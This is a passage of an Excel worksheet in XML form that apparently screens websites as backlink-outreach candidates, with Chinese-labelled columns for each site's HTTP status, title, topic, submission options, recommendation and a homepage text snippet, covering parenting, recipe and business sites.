      <x:c r="E508" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F508" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G508" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H508" s="19" t="str">
        <x:v>https://oldworldnew.us/</x:v>
      </x:c>
      <x:c r="I508" s="19" t="str">
        <x:v>Elementor Page Four &amp;mdash; Old World New</x:v>
      </x:c>
      <x:c r="J508" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K508" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L508" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M508" s="19" t="str">
        <x:v>https://oldworldnew.us/</x:v>
      </x:c>
      <x:c r="N508" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O508" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P508" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q508" s="21" t="str">
        <x:v>Elementor Page Four &amp;mdash; Old World New Blog Sustainable Living Tips Old World New Thrift Gift Guides Old World New sustaining + maintaining Thrifting, Slow Living, and Sustainability Sustainability Made Simple and Real Living sustainably shouldn’t feel like an exclusive club or an impossible challenge. At Old World New, I explore how intentional choices—like thrifting, slow living, and reducing waste—can align with our values and fit seamlessly into real life. Through practical tips, DIY projects, and honest conversations about corporate accountability, my goal is to empower you to live sustainably without the guilt of perfectionism. Learn More Subscribe For The Latest News Sign up for sp</x:v>
      </x:c>
      <x:c r="R508" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S508" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T508" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://oldworldnew.us</x:v>
      </x:c>
    </x:row>
    <x:row r="509">
      <x:c r="A509" s="18" t="str">
        <x:v>508</x:v>
      </x:c>
      <x:c r="B509" s="19" t="str">
        <x:v>muyora.com</x:v>
      </x:c>
      <x:c r="C509" s="19" t="str">
        <x:v>https://muyora.com</x:v>
      </x:c>
      <x:c r="D509" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E509" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F509" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G509" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H509" s="19" t="str">
        <x:v>https://muyora.com/</x:v>
      </x:c>
      <x:c r="I509" s="19" t="str">
        <x:v>Muyora &amp;ndash; Muyoracom</x:v>
      </x:c>
      <x:c r="J509" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K509" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L509" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M509" s="19" t="str">
        <x:v>https://muyora.com/</x:v>
      </x:c>
      <x:c r="N509" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O509" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P509" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q509" s="21" t="str">
        <x:v>Muyora &amp;ndash; Muyoracom Skip to content Submit Close search Just added to your cart Qty: View cart ( ) Continue shopping Home Catalog Blog FAQ Submit Search Cart 0 items Home Catalog Blog FAQ Featured collection Bag-a-Vie Purse Pillow Shaper Insert - Luxury Purse Shaper and Handbag Shapers - Handbag Organizer Storage - Purse and Handbag Pillow - Made to fit Hermes Kelly 28cm - Made in the USA Bag-a-Vie Purse Pillow Shaper Insert - Luxury Purse Shaper and Handbag Shapers - Handbag Organizer Storage - Purse and Handbag Pillow - Made to fit Hermes Kelly 28cm - Made in the USA Regular price Sold out Sale price $48.95 Sale Unit price / per Quick links Search Privacy Talk about your business Shar</x:v>
      </x:c>
      <x:c r="R509" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S509" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T509" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://muyora.com</x:v>
      </x:c>
    </x:row>
    <x:row r="510">
      <x:c r="A510" s="18" t="str">
        <x:v>509</x:v>
      </x:c>
      <x:c r="B510" s="19" t="str">
        <x:v>monetizationmethod.com</x:v>
      </x:c>
      <x:c r="C510" s="19" t="str">
        <x:v>https://monetizationmethod.com</x:v>
      </x:c>
      <x:c r="D510" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E510" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F510" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G510" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H510" s="19" t="str">
        <x:v>https://monetizationmethod.com/</x:v>
      </x:c>
      <x:c r="I510" s="19" t="str">
        <x:v>Learn How to Monetize Your Blog (The Way The Experts Do)</x:v>
      </x:c>
      <x:c r="J510" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K510" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L510" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M510" s="19" t="str">
        <x:v>https://monetizationmethod.com/</x:v>
      </x:c>
      <x:c r="N510" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O510" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P510" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q510" s="21" t="str">
        <x:v>Learn how to monetize your blog effectively, without the need for tens of thousands of visitors each month. Learn How to Monetize Your Blog (The Way The Experts Do) Skip to content Monetization Method Learn How to Monetize Your Blog The Way The Experts Do Quiz Interviews Income Database Free Resources Blog Login Home You don't actually need a crap-tonne of traffic to make a living online Request our free resources below, and learn to monetize your blog the way the experts do Name Email Get Started! 14+ Modules Our training modules cover all the main monetization methods 10 Activites Complete our activities and you'll be lightyears ahead of the competition. 11 Resources Worksheets, calculators, and templates are included to save you months of trial &amp; error. Monetizing a Blog is Complicated MONETIZA</x:v>
      </x:c>
      <x:c r="R510" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S510" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T510" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://monetizationmethod.com</x:v>
      </x:c>
    </x:row>
    <x:row r="511">
      <x:c r="A511" s="18" t="str">
        <x:v>510</x:v>
      </x:c>
      <x:c r="B511" s="19" t="str">
        <x:v>recipe4peace.com</x:v>
      </x:c>
      <x:c r="C511" s="19" t="str">
        <x:v>https://recipe4peace.com</x:v>
      </x:c>
      <x:c r="D511" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E511" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F511" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G511" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H511" s="19" t="str">
        <x:v>https://recipe4peace.com/</x:v>
      </x:c>
      <x:c r="I511" s="19" t="str">
        <x:v>Recipe 4 Peace - Recipe 4 Peace</x:v>
      </x:c>
      <x:c r="J511" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K511" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L511" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M511" s="19" t="str">
        <x:v>https://recipe4peace.com/</x:v>
      </x:c>
      <x:c r="N511" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O511" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P511" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q511" s="21" t="str">
        <x:v>BROWSE RECIPES Recipe 4 Peace - Recipe 4 Peace Skip to content Menu Menu ALL Recipes Appetizers Main Dishes Side Dishes Salads Desserts Drinks ABOUT ME CONTACT PRIVACY POLICY LATEST RECIPES Tropical Citrus Sparkler 20 Creative Ninja Creami Treats to Make Crescent Roll Peach Cobbler: A Sweet Symphony of Simplicity BROWSE RECIPES Search APPETIZER MAIN DISHES SIDE DISHES SALADS DESSERTS DRINKS Hello There! ABOUT BARBAR I’m Barbara Rosenthal , a home cook who approaches cooking as a practical, everyday skill. I’m drawn to recipes that make sense, use familiar ingredients, and don’t overcomplicate the process. Recipe for Peace is where I share dishes I enjoy cooking at home, from appetizers and main dishes to s</x:v>
      </x:c>
      <x:c r="R511" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S511" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T511" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://recipe4peace.com</x:v>
      </x:c>
    </x:row>
    <x:row r="512">
      <x:c r="A512" s="18" t="str">
        <x:v>511</x:v>
      </x:c>
      <x:c r="B512" s="19" t="str">
        <x:v>xoxoshelly.com</x:v>
      </x:c>
      <x:c r="C512" s="19" t="str">
        <x:v>https://xoxoshelly.com</x:v>
      </x:c>
      <x:c r="D512" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E512" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F512" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G512" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H512" s="19" t="str">
        <x:v>https://xoxoshelly.com/</x:v>
      </x:c>
      <x:c r="I512" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J512" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K512" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L512" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M512" s="19" t="str">
        <x:v>https://xoxoshelly.com/</x:v>
      </x:c>
      <x:c r="N512" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O512" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P512" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q512" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R512" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S512" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T512" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://xoxoshelly.com</x:v>
      </x:c>
    </x:row>
    <x:row r="513">
      <x:c r="A513" s="18" t="str">
        <x:v>512</x:v>
      </x:c>
      <x:c r="B513" s="19" t="str">
        <x:v>amandaseghetti.com</x:v>
      </x:c>
      <x:c r="C513" s="19" t="str">
        <x:v>https://amandaseghetti.com</x:v>
      </x:c>
      <x:c r="D513" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E513" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F513" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G513" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H513" s="19" t="str">
        <x:v>https://www.amandaseghetti.com/</x:v>
      </x:c>
      <x:c r="I513" s="19" t="str">
        <x:v>Healthy Family Lifestyle - Amanda Seghetti</x:v>
      </x:c>
      <x:c r="J513" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K513" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L513" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M513" s="19" t="str">
        <x:v>https://www.amandaseghetti.com/</x:v>
      </x:c>
      <x:c r="N513" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O513" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P513" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q513" s="21" t="str">
        <x:v>Helping moms find a healthy balance in life with home workouts, healthy recipes and meal plans, parenting advice, and a sprinkle of DIY projects for fun! Healthy Family Lifestyle - Amanda Seghetti Skip to content Home Page About Amanda Privacy Work With Me Family Fitness Fitness Tips + Workouts Beachbody Food Food Recipes Meal Plans Fun Home &amp; Decor DIY Tutorials and Home Projects Gift Guides Helping moms find a healthy balance in life Latest Posts from Amanda Seghetti Kids Shark Bedroom Decor Ideas in Our Son’s Room Read More Feier Treadmill Star 100 Review: My Experience Read More Zupapa Trampoline Review: Top Pick for Kids’ Fun Read More How Our Family Got Rid Of Bed Bugs: Pictures and Treatment Read More 60 Fun Games for Teens and Tweens (Family and Party Games) Read More 125 Fun Get to Know You Questions for Kids &amp; Parents Read More Get </x:v>
      </x:c>
      <x:c r="R513" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S513" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T513" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://amandaseghetti.com</x:v>
      </x:c>
    </x:row>
    <x:row r="514">
      <x:c r="A514" s="18" t="str">
        <x:v>513</x:v>
      </x:c>
      <x:c r="B514" s="19" t="str">
        <x:v>karenscastleblog.com</x:v>
      </x:c>
      <x:c r="C514" s="19" t="str">
        <x:v>https://karenscastleblog.com</x:v>
      </x:c>
      <x:c r="D514" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E514" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F514" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G514" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H514" s="19" t="str">
        <x:v>https://karenscastleblog.com/</x:v>
      </x:c>
      <x:c r="I514" s="19" t="str">
        <x:v>MammaBearSays - Karen's Castle Blog</x:v>
      </x:c>
      <x:c r="J514" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K514" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L514" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M514" s="19" t="str">
        <x:v>https://karenscastleblog.com/</x:v>
      </x:c>
      <x:c r="N514" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O514" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P514" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q514" s="21" t="str">
        <x:v>Template for displaying homepage sections MammaBearSays - Karen's Castle Blog Search for: Skip to content Home Family Family Adventures Kids &amp; Twins Mom Life Celebrations &amp; Holidays Disney Crafts and DIYs Kids’ Crafts Holiday &amp; Party Crafts Craft Machines Home Decor DIYs Vida Conversations Garden Home Recipes Home Family Family Adventures Kids &amp; Twins Mom Life Celebrations &amp; Holidays Disney Crafts and DIYs Kids’ Crafts Holiday &amp; Party Crafts Craft Machines Home Decor DIYs Vida Conversations Garden Home Recipes Family Old Friends I remember a time when I used to write so much on this page. Weekly blog posts! So many tutorials, adventures, and all the tips… Read More Family Kid-Friendly San Juan Capistrano There&amp;rsquo;s something abou</x:v>
      </x:c>
      <x:c r="R514" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S514" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T514" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://karenscastleblog.com</x:v>
      </x:c>
    </x:row>
    <x:row r="515">
      <x:c r="A515" s="18" t="str">
        <x:v>514</x:v>
      </x:c>
      <x:c r="B515" s="19" t="str">
        <x:v>ifitbringsyoujoy.com</x:v>
      </x:c>
      <x:c r="C515" s="19" t="str">
        <x:v>https://ifitbringsyoujoy.com</x:v>
      </x:c>
      <x:c r="D515" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E515" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F515" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G515" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H515" s="19" t="str">
        <x:v>https://ifitbringsyoujoy.com/</x:v>
      </x:c>
      <x:c r="I515" s="19" t="str">
        <x:v>Certified Life &amp; Confidence Coach: Ellen Burgan</x:v>
      </x:c>
      <x:c r="J515" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K515" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L515" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M515" s="19" t="str">
        <x:v>https://ifitbringsyoujoy.com/</x:v>
      </x:c>
      <x:c r="N515" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O515" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P515" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q515" s="21" t="str">
        <x:v>Certified Life Coach Ellen Burgan helps you break through fear-based patterns and take confident action so you feel truly alive. Build your confidence &amp; joy! Certified Life &amp; Confidence Coach: Ellen Burgan Ellen Burgan Coaching GROW YOUR CONFIDENCE &amp; JOY Skip to content Menu Home About Me Coaching Packages Testimonials Book a Call Contact Blog Self-Care Mindset Wellness Finding Joy Positive Attitude Travel/Hobbies Family Pets Favorite Products Confidence &amp; Joy Coach Are you tired of feeling stuck and can’t seem to break free from self-doubt and uncertainty? STOP SETTLING! As a Certified Life Coach, I’m dedicated to helping you overcome self-doubt, build lasting confidence, and create a fulfilling future that aligns with your deepest desires. Let’s work together so you can take control of your life and find ease, peace, and joy on your journey. Th</x:v>
      </x:c>
      <x:c r="R515" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S515" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T515" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://ifitbringsyoujoy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="516">
      <x:c r="A516" s="18" t="str">
        <x:v>515</x:v>
      </x:c>
      <x:c r="B516" s="19" t="str">
        <x:v>thenomadplate.com</x:v>
      </x:c>
      <x:c r="C516" s="19" t="str">
        <x:v>https://thenomadplate.com</x:v>
      </x:c>
      <x:c r="D516" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E516" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F516" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G516" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H516" s="19" t="str">
        <x:v>https://thenomadplate.com/</x:v>
      </x:c>
      <x:c r="I516" s="19" t="str">
        <x:v>- The Nomad Plate</x:v>
      </x:c>
      <x:c r="J516" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K516" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L516" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M516" s="19" t="str">
        <x:v>https://thenomadplate.com/</x:v>
      </x:c>
      <x:c r="N516" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O516" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P516" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q516" s="21" t="str">
        <x:v>- The Nomad Plate Skip to content New This Week: Lemon Velvet Cake Squares Home About Contact Get the latest in your inbox! Appetizers &amp; Snacks Desserts Main Dishes Drinks Holiday Cinco De Mayo 4th of July Christmas Favorite Recipe : Gluten-Free Carrot Cake The Nomad Plate The Best Dinner Recipes Cupcakes Desserts Popular Recipes More Desserts Italian Desserts Desserts Using Jello Oreo Icebox Cake 50 No Bake Potluck Desserts That Are Easy To Bring Easy Dessert Dip Recipes for Parties more RECIPE FAVORITES What’s for dinner? Browse all our Recipe Ideas to make your next meal Search By Method Chicken One Pot Meals 30 Minute Meals Desserts Trifle Recipes Trifles make a convenient dessert option</x:v>
      </x:c>
      <x:c r="R516" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S516" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T516" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://thenomadplate.com</x:v>
      </x:c>
    </x:row>
    <x:row r="517">
      <x:c r="A517" s="18" t="str">
        <x:v>516</x:v>
      </x:c>
      <x:c r="B517" s="19" t="str">
        <x:v>myruler.co.uk</x:v>
      </x:c>
      <x:c r="C517" s="19" t="str">
        <x:v>https://myruler.co.uk</x:v>
      </x:c>
      <x:c r="D517" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E517" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F517" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G517" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H517" s="19" t="str">
        <x:v>https://myruler.co.uk/?doing_wp_cron=1788322899.4361860752105712890625</x:v>
      </x:c>
      <x:c r="I517" s="19" t="str">
        <x:v>Home</x:v>
      </x:c>
      <x:c r="J517" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K517" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L517" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M517" s="19" t="str">
        <x:v>https://myruler.co.uk/?doing_wp_cron=1788322899.4361860752105712890625</x:v>
      </x:c>
      <x:c r="N517" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O517" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P517" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q517" s="21" t="str">
        <x:v>Myruler is Everything you can think off with updated information on measurements , Tools and Line for Precision learning. Home Skip to content Menu Menu HOME DIY CRAFTS COLORING DRAWING PAINTING About Privacy Policy Home Myruler ART For CRAFT and Drawing site Myruler is Everything you can think off with updated information on measurements , Tools and Line for Precision learning. 300+ Expert Articles and Quotes 17k Satisfied Visitors Per month 83% Mobile Responsive Paintings for Beginners Step into the world of painting with simple yet stunning ideas made for beginners. Learn to play with watercolor, acrylics, and gouache as you explore landscapes, abstract art, and floral scenes. Each beginner painting idea helps you understand color blending, brushwork, and layering in an enjoyable way. With easy instructions </x:v>
      </x:c>
      <x:c r="R517" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S517" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T517" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://myruler.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="518">
      <x:c r="A518" s="18" t="str">
        <x:v>517</x:v>
      </x:c>
      <x:c r="B518" s="19" t="str">
        <x:v>terabox.com</x:v>
      </x:c>
      <x:c r="C518" s="19" t="str">
        <x:v>https://terabox.com</x:v>
      </x:c>
      <x:c r="D518" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E518" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F518" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G518" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H518" s="19" t="str">
        <x:v>https://www.terabox.com/</x:v>
      </x:c>
      <x:c r="I518" s="19" t="str">
        <x:v>TeraBox - Free Cloud Storage Up To 1 TB, Send Large Files Online</x:v>
      </x:c>
      <x:c r="J518" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K518" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L518" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M518" s="19" t="str">
        <x:v>https://www.terabox.com/</x:v>
      </x:c>
      <x:c r="N518" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O518" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P518" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q518" s="21" t="str">
        <x:v>TeraBox offers 1 tb free cloud storage &amp; online file transfer. Login or Download TeraBox app to get 1 tb storage and use it on your PC, Mac, iPhone &amp; Android. TeraBox - Free Cloud Storage Up To 1 TB, Send Large Files Online</x:v>
      </x:c>
      <x:c r="R518" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S518" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T518" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://terabox.com</x:v>
      </x:c>
    </x:row>
    <x:row r="519">
      <x:c r="A519" s="18" t="str">
        <x:v>518</x:v>
      </x:c>
      <x:c r="B519" s="19" t="str">
        <x:v>adgreencoat.eu</x:v>
      </x:c>
      <x:c r="C519" s="19" t="str">
        <x:v>https://adgreencoat.eu</x:v>
      </x:c>
      <x:c r="D519" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E519" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F519" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G519" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H519" s="19" t="str">
        <x:v>https://adgreencoat.eu/</x:v>
      </x:c>
      <x:c r="I519" s="19" t="str">
        <x:v>Adgreencoat® – Ontdek de kracht van cool.</x:v>
      </x:c>
      <x:c r="J519" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K519" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L519" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M519" s="19" t="str">
        <x:v>https://adgreencoat.eu/</x:v>
      </x:c>
      <x:c r="N519" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O519" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P519" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q519" s="21" t="str">
        <x:v>Adgreencoat® – Ontdek de kracht van cool. Menu Home Over Adgreencoat® Toepassingen Sectoren Cases Energielijst RVO Awards FAQ Contact Ontdek de kracht van cool. Over Adgreencoat Contact OVER ADGREENCOAT® De effectieve en milieuvriendelijke bescherming tegen zonwarmte voor gebouwen, goederen en chemicaliën. Wat is Adgreencoat®? Lees alles over de werking en voordelen van Adgreencoat®: de effectieve en groene zon-reflectieve coating. Lees meer Toepassingen Adgreencoat® wordt wereldwijd gebruikt op verschillende toepassingen binnen verschillende sectoren. Lees meer CASES Lees hier over de resultaten van een selectie wereldwijde projecten: besparingen, reducties en meer. Lees meer AWARDS Adgreen</x:v>
      </x:c>
      <x:c r="R519" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S519" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T519" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://adgreencoat.eu</x:v>
      </x:c>
    </x:row>
    <x:row r="520">
      <x:c r="A520" s="18" t="str">
        <x:v>519</x:v>
      </x:c>
      <x:c r="B520" s="19" t="str">
        <x:v>lifetimewebdesigns.com</x:v>
      </x:c>
      <x:c r="C520" s="19" t="str">
        <x:v>https://lifetimewebdesigns.com</x:v>
      </x:c>
      <x:c r="D520" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E520" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F520" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G520" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H520" s="19" t="str">
        <x:v>https://lifetimewebdesigns.com/</x:v>
      </x:c>
      <x:c r="I520" s="19" t="str">
